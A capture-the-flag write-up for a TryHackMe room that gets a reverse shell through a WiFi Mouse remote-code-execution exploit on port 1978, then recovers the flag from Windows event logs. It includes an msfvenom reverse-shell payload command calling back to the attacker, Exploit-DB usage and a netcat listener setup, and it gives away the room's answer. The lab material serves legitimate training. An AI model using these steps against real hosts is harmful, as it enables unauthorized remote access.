Micky Mouse Writeup

YCTF – Weekly Micky Mouse VM Challenge Writeup.

Room name: Micky Mouse

Room link: https://tryhackme.com/jr/yctfweekly


When did Micky Mouse complete its half-century? The Micky Mouse event was the best event in the world 😁 Can you find the flag of YCTF `event?

Hint 1: Have you tried nmap -Pn

(Direct/straight hint)

Hint 2: Micky's 50 Mouse year might help! It's the way to get inside!

(A quick Google search gives 1978 as Micky's 50th anniversary.)

Let's begin with the exploitation!

First we try to ping the machine, but get no response: ICMP packets are blocked.

So let's scan the target using rustscan:

└─# rustscan -a
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 

We can see above that ports 1978 and 3389 are open.

But nmap reports the host as down:

└─# nmap -vv
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:16 EST
Initiating Ping Scan at 09:16
Scanning [4 ports]
Completed Ping Scan at 09:17, 3.02s elapsed (1 total hosts)
Nmap scan report for [host down, received no-response]
Read data files from: /usr/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.08 seconds
           Raw packets sent: 8 (304B) | Rcvd: 0 (0B)

To get around this, we add -Pn, which skips host discovery: nmap then treats the host as up and the port scan begins!

So we used the nmap flags -Pn (no ping), -O (OS detection) and -sV (service version detection) to scan only ports 1978 and 3389:

└─# nmap -p1978,3389 -sV -O -Pn 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-26 09:33 EST
Nmap scan report for
Host is up (0.16s latency).

1978/tcp open  unisql?
3389/tcp open  ms-wbt-server?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 or Windows 8 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.61 seconds

We now know the service and OS running on the target. A simple search for "port 1978 unisql" leads to the first result: WiFi Mouse - Remote Code Execution.

Download the exploit: https://www.exploit-db.com/exploits/49601

Before running it, create an msfvenom payload, specifying your LHOST and LPORT:

└─# msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=1234 -f exe > thmouse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

Now, in one tab, run the Python HTTP server.

In a second tab, listen with netcat.

In a third tab, run the exploit!

python3 mouse.py <Target IP> <tun0 IP> <Payload.exe>

Hola!! You got the shell!

Now read the description and the question again. What do they say?

They say: Can you find the flag of YCTF `event?

This is the biggest hint: the word EVENT is repeated in both the description and the question.

Now it makes sense to look into the Windows event logs.

Using the command wevtutil qe Application we can list all the events in the Application log on Windows.

Scrolling a little further down, we find a fake flag.

So I copied the whole log file to my machine and searched for Base64 strings manually. By searching for the string == we got one string:


Decoding the Base64 string in CyberChef gives us another hint, which says:

did you check event id 69 huh?

So I tried looking for event ID 69.

Looking closely at event ID 69, we can see a strange string,


which, after pasting it into CyberChef and applying a hex decode, gives us the actual flag!

Flag: YCTF{R00m_fu11_0f_m0u53}
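The two decoding steps above (hunting for padded Base64 in an exported Application log, then hex-decoding the odd string in event ID 69) as a small script. This is an added example, not code from the room or the original writeup; it assumes the log was exported with wevtutil's default XML output, and the sample events, the Base64 hint and the hex flag are all constructed.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample in the shape `wevtutil qe Application` prints (one <Event>
# per line). IDs, messages, the Base64 hint and the hex flag are all made up.
EVENT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
SAMPLE_LOG = "\n".join(
    f"<Event xmlns='{EVENT_NS}'><System><EventID>{eid}</EventID>"
    f"<Channel>Application</Channel></System>"
    f"<EventData><Data>{msg}</Data></EventData></Event>"
    for eid, msg in [
        (1000, "Service started normally"),
        (1001, "YCTF{th1s_1s_th3_f4k3_fl4g}"),
        (1002, "note: Y2hlY2sgZXZlbnQgaWQgNjkgaHVoPw=="),
        (69, "payload 594354467b6833785f73346d706c337d sent"),
    ]
)

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={1,2}")  # padded Base64, like the '==' search
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2}){8,}")    # 8 or more bytes of contiguous hex

def parse_events(log_text):
    """Return (event_id, data_text) pairs from wevtutil's XML output."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        root = ET.fromstring(line)
        eid = int(root.findtext(".//{*}EventID"))
        data = " ".join((d.text or "") for d in root.iterfind(".//{*}Data"))
        events.append((eid, data))
    return events

def find_base64_hints(events):
    """Decode every padded Base64 token that yields printable text."""
    hints = []
    for eid, data in events:
        for token in B64_RE.findall(data):
            try:
                decoded = base64.b64decode(token, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if decoded.isprintable():
                hints.append((eid, decoded))
    return hints

def hex_strings_in_event(events, wanted_id):
    """Hex-decode the strange strings in one event ID (69 in the room)."""
    return [bytes.fromhex(t).decode("ascii", errors="replace")
            for eid, data in events if eid == wanted_id for t in HEX_RE.findall(data)]
```

On a real export, feed the file contents to parse_events and run both helpers; unpadded Base64 (no trailing =) will not match the first regex, which is exactly the limitation of the manual == search.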

Challenge Credits: Munazir

Hope you enjoyed the machine and learned new things from the challenge! 🌟📚
